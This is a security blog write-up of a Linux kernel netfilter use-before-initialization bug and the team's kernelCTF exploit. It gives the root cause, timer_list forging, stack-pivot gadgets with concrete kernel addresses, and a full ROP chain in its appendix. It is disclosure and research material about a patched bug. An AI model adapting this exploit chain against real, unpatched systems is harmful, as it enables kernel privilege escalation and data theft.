Overview

From a Netfilter Bug to kernelCTF: Exploiting CVE-2026-23274 in the Linux Kernel and Winning a $10,500 Bounty

Nebusec
April 14, 2026
18 min read

Over the past few months, we have been building a new LLM-based security research pipeline that includes automated vulnerability discovery, PoC validation, and exploit generation. This pipeline has already found more than 300 bugs in the Linux kernel, as well as several high-risk zero-day vulnerabilities in the Google Chrome V8 JavaScript engine, leading to multiple kernelCTF wins and more than $100,000 in bug bounties. You can find the full list of bugs here. We have followed the responsible disclosure process, and we will publish more details in the future.

In March, our pipeline discovered a critical vulnerability in the Linux kernel’s netfilter subsystem. We exploited this vulnerability and earned $10,500 through Google kernelCTF. In this post, we walk through the technical details of the vulnerability and the exploit.

Vulnerability Summary

In net/netfilter/xt_IDLETIMER.c, when a label is first created by a rev1 rule with XT_IDLETIMER_ALARM enabled and is later reused by a rev0 rule, the kernel can invoke mod_timer() on uninitialized memory. This is a use-before-initialization condition that can subsequently lead to control-flow hijacking if the uninitialized memory is attacker-controlled.

Specifically, rev0 idletimer_tg_checkentry() reuses an existing object by label and unconditionally calls mod_timer(&info->timer->timer, ...). Rev1 can create an object with timer_type = XT_IDLETIMER_ALARM. In that case, idletimer_tg_create_v1() initializes the alarm backend and never calls timer_setup() for info->timer->timer. As a result, if a rev1 ALARM rule is created first and a rev0 rule later reuses the same label, rev0 touches a struct timer_list that was never initialized.

Vulnerability Analysis

This bug was introduced in Linux kernel v5.7-rc1. Commit 68983a354a65 ("netfilter: xtables: Add snapshot of hardidletimer target") introduced rev1 idletimer_tg_checkentry_v1() and also added a type-confusion check there.

if (info->timer->timer_type != info->timer_type) {
    pr_debug("Adding/Replacing rule with same label and different timer type is not allowed\n");
    mutex_unlock(&list_mutex);
    return -EINVAL;
}

However, the rev0 path in idletimer_tg_checkentry() still lacks a type-confusion check. As a result, this bug can be triggered by first creating a rev1 ALARM rule and then creating a rev0 rule with the same label, but not the other way around.

In the newly added idletimer_tg_create_v1(), if timer_type & XT_IDLETIMER_ALARM, the function calls only alarm_init() and alarm_start_relative(), but does not call timer_setup() for info->timer->timer:

if (info->timer->timer_type & XT_IDLETIMER_ALARM) {
    ktime_t tout;

    /* ALARM path: timer_setup() is never called, so
     * info->timer->timer stays uninitialized. */
    alarm_init(&info->timer->alarm, ALARM_BOOTTIME,
               idletimer_tg_alarmproc);
    info->timer->alarm.data = info->timer;
    tout = ktime_set(info->timeout, 0);
    alarm_start_relative(&info->timer->alarm, tout);
} else {
    timer_setup(&info->timer->timer, idletimer_tg_expired, 0);
    mod_timer(&info->timer->timer,
              msecs_to_jiffies(info->timeout * 1000) + jiffies);
}

Later, rev0’s idletimer_tg_checkentry() can fetch the timer created by rev1 because __idletimer_tg_find_by_label() uses the same global idletimer_tg_list. It then unconditionally calls mod_timer(&info->timer->timer, ...), triggering the use-before-initialization bug.

info->timer = __idletimer_tg_find_by_label(info->label);
if (info->timer) {
    info->timer->refcnt++;
    mod_timer(&info->timer->timer,
              msecs_to_jiffies(info->timeout * 1000) + jiffies); // use-before-init, later escalated to control-flow hijack
    pr_debug("increased refcnt of timer %s to %u\n",
             info->label, info->timer->refcnt);
}

Our team patched the bug in v7.0-rc4 after the kernelCTF submission.

Exploit

Exploit Summary

  • Prefetch → Kernel base address leak
  • CVE-2026-23274 → Uninitialized use in mod_timer(); a payload left in kmalloc-256 escalates this directly to a control-flow hijack
  • NPerm → Place fake stack for ROP chain
  • ROP → After the control-flow hijack, pivot to the fake stack and execute a ROP chain in softirq context that reads the flag.

Exploit Details

From Uninitialized Use to Control Flow Hijack

Because mod_timer() operates on the uninitialized info->timer->timer field, and the containing idletimer_tg object is allocated with kmalloc(sizeof(*info->timer), GFP_KERNEL), we can control the timer's contents by making that allocation land in a freed kmalloc-256 chunk that still holds attacker-sprayed data.

In rev1, struct idletimer_tg has its alarm field initialized, but not its timer field.

That timer_list is what mod_timer() later operates on, and it contains the callback function pointer function:

struct idletimer_tg {
    struct list_head entry;
    struct alarm alarm;
    struct timer_list timer;
    struct work_struct work;
    struct kobject *kobj;
    struct device_attribute attr;
    unsigned int refcnt;
    u8 timer_type;
};

struct timer_list {
    struct hlist_node entry;
    unsigned long expires;
    void (*function)(struct timer_list *);
    u32 flags;
};

In mod_timer() and __mod_timer():

int mod_timer(struct timer_list *timer, unsigned long expires)
{
    return __mod_timer(timer, expires, 0);
}

static inline int
__mod_timer(struct timer_list *timer, unsigned long expires, unsigned int options)
{
    unsigned int idx = UINT_MAX;
    ...
    debug_assert_init(timer);

    if (!(options & MOD_TIMER_NOTPENDING) && timer_pending(timer)) {
        ... // We avoid this branch by controlling entry.pprev so timer_pending(timer) returns false.
    } else {
        base = lock_timer_base(timer, &flags); // Set timer->flags to 0 to avoid an infinite loop here.
        if (!timer->function)
            goto out_unlock;
        forward_timer_base(base);
    }
    ...
    debug_timer_activate(timer);
    timer->expires = expires;
    if (idx != UINT_MAX && clk == base->clk) // Not taken
        enqueue_timer(base, timer, idx, bucket_expiry);
    else
        internal_add_timer(base, timer); // Will give us CFH later by setting timer->function

out_unlock:
    raw_spin_unlock_irqrestore(&base->lock, flags);
    return ret;
}

To pass the timer_pending() check, we simply need to set entry.pprev to 0:

struct hlist_node {
    struct hlist_node *next, **pprev;
};

static inline int timer_pending(const struct timer_list * timer)
{
    return !hlist_unhashed_lockless(&timer->entry);
}

static inline int hlist_unhashed_lockless(const struct hlist_node *h)
{
    return !READ_ONCE(h->pprev);
}

And also set timer->flags to 0 to avoid an infinite loop in lock_timer_base():

static struct timer_base *lock_timer_base(struct timer_list *timer,
                                          unsigned long *flags)
    __acquires(timer->base->lock)
{
    for (;;) {
        struct timer_base *base;
        u32 tf;

        tf = READ_ONCE(timer->flags);

        if (!(tf & TIMER_MIGRATING)) { // must enter this branch to avoid an infinite loop
            base = get_timer_base(tf);
            raw_spin_lock_irqsave(&base->lock, *flags);
            if (timer->flags == tf)
                return base;
            raw_spin_unlock_irqrestore(&base->lock, *flags);
        }
        cpu_relax();
    }
}

After one second, the callback in our forged timer_list executes in softirq context, giving us an arb_function(EVIL_TIMER_LIST) primitive.

Stack Pivot after Control Flow Hijack

We discuss why we did not use Ret2BPFJIT in the “Additional Notes” section.

Because the UBI timer_list is rewritten in __mod_timer(), we can directly control only the function pointer, not the arguments.

At that point, RDI and R13 point to the overwritten timer_list, which is part of idletimer_tg in kmalloc-256. If we spray data with user_keypayload into the adjacent chunk, we control roughly the byte range [0x90, 0x170] relative to RDI/R13 (or the corresponding negative offsets) as our payload.

(We failed to use builder.AddPayload(payload, Register::{RDI, R13}, [0x90-0x170]); in libxdk, so we turned to our own gadgets.)

We therefore used the following gadgets, which exist in both cos-113-18244.582.2 and cos-113-18244.582.40.

The first-stage gadget controlled RDI and RIP at the same time. To store the fake stack frame, we used NPerm from @kylebot and @n132 in CVE-2025-38477 to place the new stack at a chosen address.

Because the ROP chain is extremely long, we still needed NPerm to create a larger fake stack frame, even though cpu_entry_area was not randomized before Linux 6.2.

The second gadget controlled RDX and RIP at the same time, and also set RBX to a valid address so the final stack-pivot gadget would not crash.
At this point, RDX == RDI == the address of the NPerm fake stack frame.

Finally, the third gadget pivoted RSP from RDX and began ROP execution.

// --- initial stack pivot gadgets ---
// In short, the stack pivot is:
// 1. control PC; [rdi/r13 + 0x90] is a controllable user_keypayload range.
// 2. control PC and rdx; rbx = rdi points into a controllable NPerm range.
// 3. control PC and rsp = rdx; we can now start ROP. Writing to [rbx] will not crash.
size_t timer_stage1_callback = 0xffffffff81313849;
// timer_stage1_callback: mov rdi, [r13+0xc8]; mov rax, [r13+0xc0]; mov rsi, r12; call rax;
// mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*?mov r.{1,4}, \[r[d1][i13]\+0x[9-f][0-f]\].*?
// This is the first CFH; we use timer_stage1_callback to control rdi and rip at the same time
// rdi and rip are fetched from the next slot, currently we use user_keypayload to place pointer there
size_t nperm_stage1_dispatch = 0xffffffff810643b9;
// nperm_stage1_dispatch:
// mov rbx, rdi; sub rsp, 0x20; movzx r12d, byte ptr [rdi+0x7a];
// mov rdx, [rdi+0xc0]; mov rax, gs:[0x28]; mov [rsp+0x18], rax; xor eax, eax;
// mov rax, [rdi+8]; mov esi, r12d; mov rax, [rax+0xa8]; call rax;
// This is mainly for controlling rdx and rip (we will do a stack pivot using rdx in the next gadget).
// This also sets rbx to a valid address so the stack pivoting gadget won't crash.
size_t nperm_stack_pivot = 0xffffffff81db2b0f;
// nperm_stack_pivot: push rdx; add [rcx], dh; rcr byte ptr [rbx+0x5d], 0x41; pop rsp; pop r13; ret;
// This is the final stack pivot

ROP to read the flag

We discuss why we did not use core_pattern in the “Additional Notes” section.

There were several issues to solve because we were ROPing in softirq context. Rather than handle them individually, we chose to use a longer ROP chain. NPerm gave us a maximum payload size of 512*8 bytes.

We then used the ROP chain to directly read the flag and print it to the kernel log:

  • Prepare a fake work_struct in a stable writable kernel region. This object is loaded by rpc_prepare_task+5 as a second controlled object and transfers control into a second pivot sequence. This lets us leave the timer softirq path as early as possible and move the final logic into process context.

  • Use another attacker-controlled writable kernel region, populated via an arbitrary write during ROP, to hold both the pivot metadata and the final ROP stack. The metadata provides the pop rsp target used by the indirect branch from the fake work item. The stack then writes /flag, a printk format string whose log level keeps the message visible even to a low-privileged attacker, a read position, and a read buffer into writable kernel memory. With those arguments in place, the chain performs filp_open, kernel_read, and finally _printk to emit the flag. We did not use an arbitrary write to set dmesg_restrict to 0, but since we were already doing ROP, we could easily have added that if needed.

  • Queue the fake work item onto CPU0 and stop the current CPU. The queued kworker can then run the open-read-printk sequence from process context.

This queueing step is necessary because direct VFS activity from timer softirq context is fragile.

Here is the equivalent of our ROP chain in C-like pseudocode:

struct fake_work_item {
    struct work_struct work;
    struct fake_rpc_dispatch {
        void *stage2_base;
        void *dispatch_target_slot;
    } dispatch;
};

struct flag_read_context {
    char path[16];
    char fmt[16];
    loff_t pos;
    char buf[0x80];
};

static void stage2_behavior(struct flag_read_context *ctx) {
    struct file *fp;

    fp = filp_open(ctx->path, O_NOATIME, 0);
    kernel_read(fp, ctx->buf, sizeof(ctx->buf), &ctx->pos);
    _printk(ctx->fmt, ctx->buf);
    for (;;)
        cpu_relax();
}

static void semantic_rop_behavior(void *work_base, void *pivot_base) {
    struct flag_read_context *ctx = pivot_base + 0x98;

    // prepare stage2 context
    strcpy(ctx->path, "/flag");
    strcpy(ctx->fmt, "\001%s\n"); // make it readable to a very low-level attacker
    ctx->pos = 0;
    memset(ctx->buf, 0, sizeof(ctx->buf));

    // stage1 behavior, prepare fake work
    struct fake_work_item *item = work_base; // any rw kernel address
    item->work.data = WORK_STRUCT_PENDING_BITS;
    item->work.entry.next = &item->work.entry;
    item->work.entry.prev = &item->work.entry;
    item->work.func = (work_func_t)rpc_prepare_task_plus_5;
    item->dispatch.stage2_base = pivot_base;
    item->dispatch.dispatch_target_slot = &((char *)pivot_base)[0x66];
    *(void **)item->dispatch.dispatch_target_slot = pop_rsp_pop_r13_ret;
    queue_work_on(0, system_wq, &item->work);
    stop_this_cpu();
    // The real exploit forges enough metadata so that rpc_prepare_task+5 pivots into a stack whose
    // effect is equivalent to calling stage2_behavior(ctx) from kworker process context.
}

The full ROP chain can be found in the appendix.

Overall, the ROP plan is: use the timer corruption to reach NPerm-backed stack control, use that control to build and queue fake work, and let the queued kworker execute the final file-read-and-print sequence in process context.

Additional Notes

Why not use Ret2BPFJIT

Although kernelCTF now enables bpf_jit_harden by default, attackers can still spray a “kernel one gadget” with unpoisoned instructions and gain root, as shown in the CVE-2025-21700 exploit.

However, their 100% success-rate solution appears to rely on certain registers pointing to a valid address as a side effect of their nop sled.
Those register constraints were not satisfied in our case, and we did not try to adapt or replace the nop sled to make their solution work. As a result, the “kernel one gadget” approach was not viable for us.

Why use ROP to read the flag

Because our corrupted timer_list executed in softirq context, we could not use normal COMMIT_CREDS_RETURN_USER ROP to gain a root shell, nor could we use tricks like telefork.

For the common LPE and container escape technique based on core_pattern, we also could not reliably trigger the usermode helper for the following reasons:

  • During the stack pivot, we overwrite some callee-saved registers that would be needed to return cleanly from softirq context, mainly for unlocking and related cleanup. We therefore halted the core by calling msleep in softirq context because we had two cores available.
  • The core dump queues the UMH if core_pattern[0] == '|', and then waits for the dumped process group to exit. That means it queues the actual call_usermodehelper(OUR_LPE_PAYLOAD) request instead of executing it directly.
  • In our case, the queued request always went to the halted core. As a result, our payload kept being queued but never executed.

We therefore moved to manually queue a read-flag work item onto another core before halting the first core.
The resulting ROP chain is relatively long, and several required gadgets cannot currently be generated by libxdk.

Appendix

Full ROP payload:

size_t nperm_addr = 0xffffffff84697000;
size_t kaslr_off;
void nperm() {
size_t ctx[0x200] = {};
size_t nperm_stack_pivot = kaslr_off + 0xffffffff81db2b0f;
size_t pop_rax_pop_rdx_ret = kaslr_off + 0xffffffff812a0d4c;
size_t write_qword_rax_plus_c0_rdx_ret = kaslr_off + 0xffffffff811ff6c5;
size_t rpc_prepare_task_dispatch = kaslr_off + 0xffffffff822248b5;
size_t push_rsi_jmp_qword_ptr_rsi_plus_0x66 =
kaslr_off + 0xffffffff81c6d191;
size_t pop_rsp_pop_r13_ret = kaslr_off + 0xffffffff81002148;
size_t add_rsp_0x88_ret = kaslr_off + 0xffffffff81240dbd;
size_t pop_rsi_ret = kaslr_off + 0xffffffff81b083be;
size_t pop_rdx_pop_rdi_ret = kaslr_off + 0xffffffff819376ab;
size_t pop_rsi_pop_rdi_ret = kaslr_off + 0xffffffff81afda91;
size_t pop_rsi_pop_rdx_pop_rcx_ret = kaslr_off + 0xffffffff810e0e4a;
size_t filp_open = kaslr_off + 0xffffffff8143a420;
size_t mov_rdi_rax_ret = kaslr_off + 0xffffffff8126317d;
size_t kernel_read = kaslr_off + 0xffffffff8143cf10;
size_t printk = kaslr_off + 0xffffffff8120f4b0;
size_t execute_in_process_context_queue = kaslr_off + 0xffffffff811c87f8;
size_t stop_this_cpu = kaslr_off + 0xffffffff810fe7c0;
size_t jmp_self = kaslr_off + 0xffffffff81000649;
size_t work_base = 0xffffffff84560920;
size_t pivot_base = 0xffffffff84560a20;
size_t path_ptr = 0xffffffff84560e20;
size_t fmt_ptr = 0xffffffff84560e30;
size_t pos_ptr = 0xffffffff84560e40;
size_t buf_ptr = 0xffffffff84560e60;
size_t work_slot_base = work_base - 0xc0;
size_t pivot_slot_base = pivot_base - 0xc0;
size_t final_stage_slot_base = pivot_base + 0x98 - 0xc0;
size_t fake_work_list = work_base + 0x08;
size_t pivot_indirect_window = pivot_slot_base + 0x60;
size_t path_storage_slot = path_ptr - 0xc0;
size_t fmt_storage_slot = fmt_ptr - 0xc0;
size_t pos_storage_slot = pos_ptr - 0xc0;
size_t fake_work_data = 0x0000000fffffffe0;
size_t file_open_flags = 0x0000000000040000;
size_t read_count = 0x0000000000000080;
size_t flag_string = 0x00000067616c662f;
size_t fmt_lo = 0x253a47414c463001;
size_t fmt_hi = 0x0000000000000a73;
ctx[1] = kaslr_off + nperm_addr - 0xa8 + 16; // +0xa8=nperm[2]
ctx[2] = nperm_stack_pivot; // rax = New PC
// 0xffffffff81db2b0f: push rdx; add [rcx], dh; rcr byte ptr [rbx+0x5d], 0x41; pop rsp; pop r13; ret;
// rsp = rdx = NPerm[24]
ctx[24] = kaslr_off + nperm_addr + 8 * 25;
// r13 = NPerm[25]
// PC = NPerm[26]
/*
* Real full ROP chain.
*
* Fixed writable kernel staging layout (no-KASLR addresses; runtime code
* adds kaslr_off to code pointers only):
*
* 0xffffffff84560920 WORK_BASE : fake work_struct + rpc_prepare_task slots
* 0xffffffff84560a20 PIVOT_BASE : process-context pivot metadata + final ROP stack
* 0xffffffff84560e20 PATH_PTR : "/flag"
* 0xffffffff84560e30 FMT_PTR : "\x010FLAG:%s\n"
* 0xffffffff84560e40 POS_PTR : loff_t position for kernel_read()
* 0xffffffff84560e60 BUF_PTR : kernel_read() output buffer
*
* The odd 0xffffffff845608xx / 0xffffffff845609xx constants below are
* "target - 0xc0" because the write gadget is:
*
* 0xffffffff811ff6c5: mov qword ptr [rax + 0xc0], rdx ; ret
*
* Early slot map:
*
* 0xffffffff84560860 -> WORK_BASE+0x00 : fake work_struct.data
* 0xffffffff84560868 -> WORK_BASE+0x08 : fake work.entry.next
* 0xffffffff84560870 -> WORK_BASE+0x10 : fake work.entry.prev
* 0xffffffff84560878 -> WORK_BASE+0x18 : fake work.func / stage1 dispatcher
* 0xffffffff84560880 -> WORK_BASE+0x20 : cleared padding
* 0xffffffff845608f0 -> WORK_BASE+0x90 : stage2 RSI base
* 0xffffffff845608f8 -> WORK_BASE+0x98 : pointer to dispatch target slot
* 0xffffffff84560900 -> WORK_BASE+0xa0 : dispatch target contents
* 0xffffffff84560960 -> PIVOT_BASE+0x00 : pop-rsp chain head
* 0xffffffff845609c6 -> PIVOT_BASE+0x66 : indirect jump slot for pop rsp
*
* Gadget summary used below:
*
* 0xffffffff812a0d4c: pop rax ; pop rdx ; ret
* 0xffffffff811ff6c5: mov qword ptr [rax + 0xc0], rdx ; ret
* 0xffffffff822248b5: rpc_prepare_task+5:
* mov rax,[rdi+0x98]; mov rsi,[rdi+0x90];
* mov rax,[rax]; jmp __x86_indirect_thunk_array
* 0xffffffff81c6d191: push rsi ; jmp qword ptr [rsi+0x66]
* 0xffffffff81002148: pop rsp ; pop r13 ; ret
* 0xffffffff81240dbd: add rsp, 0x88 ; ret
* 0xffffffff8143a420: filp_open
* 0xffffffff8126317d: mov rdi, rax ; ret
* 0xffffffff8143cf10: kernel_read
* 0xffffffff8120f4b0: _printk
* 0xffffffff811c87f8: execute_in_process_context+0x48:
* mov rsi,rdx; load system_wq; call queue_work_on
* 0xffffffff810fe7c0: stop_this_cpu
*/
int rop = 26;
// Build fake work_struct and rpc_prepare_task slots under WORK_BASE.
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = work_slot_base + 0x00;
ctx[rop++] = fake_work_data;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = work_slot_base + 0x08;
ctx[rop++] = fake_work_list;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = work_slot_base + 0x10;
ctx[rop++] = fake_work_list;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = work_slot_base + 0x18;
ctx[rop++] = rpc_prepare_task_dispatch;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = work_slot_base + 0x20;
ctx[rop++] = 0x0;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
// Seed stage2 dispatcher object:
// WORK_BASE+0x90 -> RSI base for rpc_prepare_task+5
// WORK_BASE+0x98 -> pointer to slot holding final jump target
// WORK_BASE+0xa0 -> target gadget for the RSI-based pivot
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = work_slot_base + 0x90;
ctx[rop++] = pivot_base;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = work_slot_base + 0x98;
ctx[rop++] = pivot_indirect_window;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = work_slot_base + 0xa0;
ctx[rop++] = push_rsi_jmp_qword_ptr_rsi_plus_0x66;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
// Lay out the process-context pivot metadata at PIVOT_BASE.
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = pivot_slot_base + 0x00;
ctx[rop++] = 0x0;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = pivot_slot_base + 0x08;
ctx[rop++] = add_rsp_0x88_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = pivot_slot_base + 0x60;
ctx[rop++] = 0x0;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = pivot_slot_base + 0x68;
ctx[rop++] = 0x0;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = pivot_slot_base + 0x66;
ctx[rop++] = pop_rsp_pop_r13_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
// Final process-context ROP stack:
// write "/flag"
// write printk fmt
// zero loff_t
// filp_open -> kernel_read -> _printk
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x00;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x08;
ctx[rop++] = path_storage_slot;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x10;
ctx[rop++] = flag_string;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x18;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x20;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x28;
ctx[rop++] = fmt_storage_slot;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x30;
ctx[rop++] = fmt_lo;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x38;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x40;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x48;
ctx[rop++] = fmt_storage_slot + 0x08;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x50;
ctx[rop++] = fmt_hi;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x58;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x60;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x68;
ctx[rop++] = pos_storage_slot;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x70;
ctx[rop++] = 0x0;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x78;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x80;
ctx[rop++] = pop_rsi_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x88;
ctx[rop++] = file_open_flags;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x90;
ctx[rop++] = pop_rdx_pop_rdi_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x98;
ctx[rop++] = 0x0;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0xa0;
ctx[rop++] = path_ptr;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0xa8;
ctx[rop++] = filp_open;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0xb0;
ctx[rop++] = mov_rdi_rax_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0xb8;
ctx[rop++] = pop_rsi_pop_rdx_pop_rcx_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0xc0;
ctx[rop++] = buf_ptr;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0xc8;
ctx[rop++] = read_count;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0xd0;
ctx[rop++] = pos_ptr;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0xd8;
ctx[rop++] = kernel_read;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0xe0;
ctx[rop++] = pop_rsi_pop_rdi_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0xe8;
ctx[rop++] = buf_ptr;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0xf0;
ctx[rop++] = fmt_ptr;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0xf8;
ctx[rop++] = printk;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x100;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x108;
ctx[rop++] = jmp_self;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x110;
ctx[rop++] = 0x0;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
ctx[rop++] = pop_rax_pop_rdx_ret;
ctx[rop++] = final_stage_slot_base + 0x118;
ctx[rop++] = jmp_self;
ctx[rop++] = write_qword_rax_plus_c0_rdx_ret;
// Softirq -> process-context bridge:
// rsi = fake work item
// rdi = CPU0
// execute_in_process_context+0x48 loads system_wq and calls queue_work_on()
// then stop CPU1 so CPU0 can run the queued kworker path
ctx[rop++] = pop_rsi_pop_rdi_ret;
ctx[rop++] = work_base;
ctx[rop++] = 0x0;
ctx[rop++] = execute_in_process_context_queue;
// Queue onto CPU0 and then stop CPU1 without re-enabling interrupts.
ctx[rop++] = pop_rdx_pop_rdi_ret;
ctx[rop++] = 0x0;
ctx[rop++] = 0x0;
ctx[rop++] = stop_this_cpu;
}